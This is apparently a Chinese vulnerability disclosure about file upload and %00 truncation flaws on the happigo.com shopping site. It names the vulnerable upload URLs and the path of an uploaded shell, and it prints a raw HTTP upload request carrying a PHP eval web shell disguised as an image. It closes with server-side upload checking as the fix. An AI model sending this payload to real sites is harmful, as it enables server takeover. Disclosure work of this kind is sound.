某公司任意文件上传,另外的上传页面存在欺骗上传 漏洞 (%00截断).. 欺骗上传的,不返回路径,通过前面上传的shell去看了下,确实是上传成功了的... 返回上传路径的上传页面
http://zt.happigo.com/sc/d/xiangjijie/post_pic.php#upload_ 上传的shell
http://zt.happigo.com/sc/d/xiangjijie/uploads/2012/08/20/dc3fbca363fe2a1aaf08b38e2833f403.php
另外的页面,可以通过%00截断上传,但是不返回上传的路径,但是去路径下面看了下,确实是上传上去的了~
POST /sc/d/gougoukeaixiu/action.php?method=upload HTTP/1.1 Accept: text/ html , application/xhtml+xml, */* Referer: http://zt.happigo.com/sc/d/gougoukeaixiu/index.php?result=success Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Content-Type: multipart/form-data; boundary=---------------------------7dc31fc170554 Accept-Encoding: gzip, deflate Host: zt.happigo.com Content-Length: 1600 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: [cookies]
-----------------------------7dc31fc170554 Content-Disposition: form-data; name="fileField"; filename="3.php" Content-Type: image/pjpeg
<?php @eval($_REQUEST['ok']);?> -----------------------------7dc31fc170554 Content-Disposition: form-data; name="title"
OK -----------------------------7dc31fc170554-- 上传上去的shell
另外的
不返回路径的上传页面
http://zt.happigo.com/sc/d/apply100930/upload.html http://zt.happigo.com/sc/d/gougoukeaixiu/index.php 修复方案: 在服务器端上传文件检查。另注:贵公司要对根目录下面的各个子文件夹下面的上传页面做检查~
查看更多关于快乐购物网任意文件上传&欺骗上传漏洞技巧的详细内容...